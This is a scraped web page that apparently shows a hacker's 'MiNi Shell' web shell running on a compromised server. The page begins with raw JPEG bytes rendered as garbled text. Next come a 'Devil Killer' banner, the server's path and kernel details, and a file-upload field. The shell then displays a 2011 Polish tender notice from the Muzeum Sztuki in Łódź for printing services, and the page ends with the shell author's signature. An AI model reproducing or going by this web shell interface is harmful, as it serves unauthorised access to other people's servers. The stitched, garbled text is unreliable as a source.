JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110606/157897-N-2011.html

<p class="kh_header"><b>Łódź: Zawarcie umowy ramowej na usługi poligraficzne dla Muzeum Sztuki w Łodzi, nr postępowania A-2021-9/2011</b><br>
<b>Numer ogłoszenia: 157897 - 2011; data zamieszczenia: 06.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zawarcia umowy ramowej.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Sztuki w Łodzi , ul. Więckowskiego 36, 90-734 Łódź, woj. łódzkie, tel. 042 633-97-90 w 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msl.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zawarcie umowy ramowej na usługi poligraficzne dla Muzeum Sztuki w Łodzi, nr postępowania A-2021-9/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi poligraficzne w postaci przygotowania do druku, druku i oprawy publikacji i innych materiałów poligraficznych dla Muzeum Sztuki w Łodzi (książki - część I; foldery, broszury, gazety, zaproszenia, plakaty, plakaty do gabloty ms2, banery na budynek ms, ms2, PH, wycinka ploterowa, druk cyfrowy, druk podpisów na galerię i inne - część II), według bieżącego zapotrzebowania Zamawiającego. Zamawiający dostarczy Wykonawcy pliki ze składem w jakości do druku, ewentualnie przekaże wydruki do skalibrowania kolorów (wydruki na papierze nakładowym lub typu proofy). Po przekazaniu materiałów (plików, ew. wydruków) Wykonawca przygotuje materiały do druku, tj. wykona naświetlenia typu CTP, impozycję i inne czynności przygotowujące materiał do druku. Druk i oprawa wymagają najwyższej staranności i profesjonalnego wykonania druku często 
z wykorzystaniem kolorów typu Pantone.
CZĘŚĆ I
Przedmiotem zamówień będą publikacje książkowe o nakładzie w przedziale od 300 do 2000 egzemplarzy w ramach jednego zamówienia, o wymiarach w przedziale: od 100 mm do 300 mm 
w poziomie, od 100 do 350 mm w pionie (formaty i warianty formatów: A6, A4, B5, B4 i inne); papier o zróżnicowanej gramaturze i rodzaju (przedział - od papierów na środek 80 g/m2 do tektur na okładkę 1890 g/m2), z możliwością zastosowania różnych papierów w jednej publikacji (np. 2 arkusze na cześć z tekstem na jednym papierze i 2 arkusze na część za zdjęciami na innym papierze); książki w całości czarno-białe, kolorowe lub z blokami czarno-białymi i kolorowymi 
w jednej publikacji.

CZĘŚĆ II 
Przedmiotem zamówień będą druki ulotne.



Zamawiający określa wartość przewidywanego usług poligraficznych na kwotę około 
Część I książki: 		     248 423,90 zł brutto 
Część II pozostałe druki:    139 433,03 zł brutto
Łącznie: 	                     387 856,93 zł brutto.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.52.11.00-0, 79.80.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego przez wykonawcę oświadczenia z art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do części I
Zamawiający uzna spełnienie tego warunku, gdy Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, w tym także w ramach wykonywanych świadczeń okresowych lub ciągłych, co najmniej 5 usług w zakresie druku książek spełniających następujące wymagania: kolory 4+4, twarda oprawa, format minimum B5, objętość minimum 100 stron) - o wartości nie mniejszej niż 10.000 zł brutto każda (słownie: dziesięć tysięcy złotych).
      do części II 
Zamawiający uzna spełnienie tego warunku, gdy Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, w tym także w ramach wykonywanych świadczeń okresowych lub ciągłych, co najmniej 15 usług w zakresie realizacji druków ulotnych (m.in. folder, zaproszenie, plakat) - o wartości nie mniejszej niż 1 500 zł brutto każda (słownie: jeden tysiąc pięćset  złotych) oraz 15 usług w zakresie druku banerów (na budynek) - o wartości nie mniejszej niż 300,00 zł brutto każda (słownie trzysta złotych).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli wymagane kwoty w dokumentach wymienionych powyżej wyrażone będą w innej walucie niż PLN Wykonawca dokona ich przeliczenia na PLN według średniego kursu NBP na dzień, w którym opublikowano ogłoszenie w BZP. Jeżeli w dniu opublikowania ogłoszenia o zamówieniu w BZP, Narodowy Bank Polski nie opublikuje tabeli kursów walut, Wykonawca winien przyjąć kurs przeliczeniowy według ostatniej tabeli kursów NBP, opublikowanej przed dniem publikacji ogłoszenia o zamówieniu w BZP.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony zgodnie postanawiają, że zmiany niniejszej umowy są dopuszczalne tylko za zgodą wszystkich podmiotów, które podpisały umowę ramową w ramach postępowania na realizację usług poligraficznych, określonych w § 1 niniejszej umowy.
2.	Strony postanawiają, że zmiany umowy dopuszczalne są wyłącznie w następujących sytuacjach:
a)	w przypadku zmiany przez prawodawcę wysokości podatku od towarów 
i usług w ten sposób, że do wartości netto zostanie doliczona kwota podatku VAT wg nowo wskazanych stawek.
b)	w przypadku zmiany nazw, siedzib stron umowy, numerów kont bankowych oraz innych danych identyfikacyjnych,
c)	w przypadku zmiany kwoty określonej w § 3 ust. 1 z przyczyn obiektywnych, w szczególności gdy środki na 2012 rok zostaną przyznane w niższej wysokości niż planowano,
d)	zmiany osób wyznaczonych do koordynacji przedmiotu niniejszej umowy,
e)	sprostowania oczywistych omyłek pisarskich i rachunkowych,
f)	innych zmian, których nie można przewidzieć w chwili zawierania umowy pod warunkiem, że zmiany te będą korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.msl.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Łódź 90-734 ul. Więckowskiego 36 - Dział AG.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2011 godzina 08:45, miejsce: Łódź 90-734 ul. Więckowskiego 36 - Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Publikacje książkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówień będą publikacje książkowe o nakładzie w przedziale od 300 do 2000 egzemplarzy w ramach jednego zamówienia, o wymiarach w przedziale: od 100 mm do 300 mm 
w poziomie, od 100 do 350 mm w pionie (formaty i warianty formatów: A6, A4, B5, B4 i inne); papier o zróżnicowanej gramaturze i rodzaju (przedział - od papierów na środek 80 g/m2 do tektur na okładkę 1890 g/m2), z możliwością zastosowania różnych papierów w jednej publikacji (np. 2 arkusze na cześć z tekstem na jednym papierze i 2 arkusze na część za zdjęciami na innym papierze); książki w całości czarno-białe, kolorowe lub z blokami czarno-białymi i kolorowymi 
w jednej publikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.52.11.00-0, 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Druki ulotne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówień będą druki ulotne, m.in.: 
a) foldery - w nakładzie od 300 do 4000 egzemplarzy w ramach jednego zlecenia, wymiary po złożeniu w przedziale od 80 do 150 mm w poziomie, od 100 do 300 mm w pionie; składanie i bigi (np. mapowo z wyjściowego formatu B1, B2 lub pochodnych - po złożeniu format B5; składane na trzy A4 - 2 bigi w poziomie); papier o zróżnicowanej gramaturze (80-300 g/m2), kolory: od druków dwustronnie kolorowych do dwustronnie czarno-białych (wraz ze wszystkimi wariantami, np.: 4+1, 4+2, 4+1+Pantone).
b) broszury - w nakładzie od 300 do 4000 egzemplarzy w ramach jednego zlecenia, wymiary netto (po złożeniu) w przedziale od 80 do 250 mm w poziomie, od 100 do 300 mm w pionie; składane do formatu A6, B6 lub pochodnych, możliwa oprawa zeszytowa (1 lub 2 zszywki); papier 
o zróżnicowanej gramaturze (80-300 g/m2), kolory: od broszur w całości kolorowych do w całości czarno-białych.
c) gazety - w nakładzie od 100 do 4000 egzemplarzy w ramach jednego zlecenia, wymiary netto (po złożeniu) w przedziale od 200 do 350 mm w poziomie, od 250 do 450 mm w pionie; możliwa oprawa zeszytowa (1 lub 2 zszywki); papier o zróżnicowanej gramaturze (80-300 g/m2), kolory: od gazet w całości kolorowych do w całości czarno-białych.
d) zaproszenia - w nakładzie od 800 do 10 000 egzemplarzy w ramach jednego zlecenia, wymiary w przedziale 100-250 mm u podstawy, 100-250 mm w pionie; ew. składane (np. A4 do formatu A5); papier o zróżnicowanej gramaturze (80-300 g/m2), kolory: od druków kolorowych do czarno-białych.
e) plakat - format B1 lub B2 (+- 50 mm), - w nakładzie od 100 do 500 egzemplarzy w ramach jednego zlecenia, papier o zróżnicowanej gramaturze (120-150 g/m2), kolory: od kolorowych do czarno-białych.
f) plakat do gabloty ms2 - format 120 x 180, - 1 egzemplarz w ramach jednego zlecenia, wydruk 720 dpi na banerze  450 g, kolory: od kolorowych do czarno-białych.
g) baner na budynek ms2 - 1 egzemplarz w ramach jednego zlecenia, wymiary 120x1000 cm, blockout dwustronny o gramaturze 610 g/m2, matowy, splot 500x500, tunele góra i dół, druk 600x800 dpi.
h) baner na budynek ms - wymiary 140 x 525 cm, 1 egzemplarz w ramach jednego zlecenia - baner powlekany o gramaturze 510 g/mkw., matowy, splot 1000x1000, tunele góra i dół, druk 600x800 dpi.
i) baner na budynek PH - wymiary 166x1200 cm, 1 egzemplarz w ramach jednego zlecenia, baner powlekany o gramaturze 510 g/mkw., matowy, splot 1000x1000, oczkowanie, druk 600x800 dpi.
j) wycinka ploterowa - wycięcie z folii kolorowej (mat lub błysk, najczęściej Oracal) napisów, według dostarczonego pliku (typu cdr, ai), umieszczenie wyciętych napisów na folii transportowej, najczęściej napisy z jednego lub 2 kolorów folii, wymiary od 50-400 cm u podstawy - do 50-400 cm w pionie.
k) druk cyfrowy - druk w kolorze lub czarno-biały; w formacie A3 (i mniejszych wariantach, np. A4), B1 (i mniejszych wariantach, np. B2, B3); na papierze o zróżnicowanej gramaturze (80-300 g/m2)
l) druk podpisów na galerię - druk cyfrowy (kolor lub czarno-biały) podpisów dzieł (każdy ok. 2-5 wersów tekstu) z dostarczonego pliku, na folii samoprzylepnej, naklejenie na 1 mm PCV,   wycinka zgodnie ze znacznikami cięcia z pliku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.52.11.00-0, 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com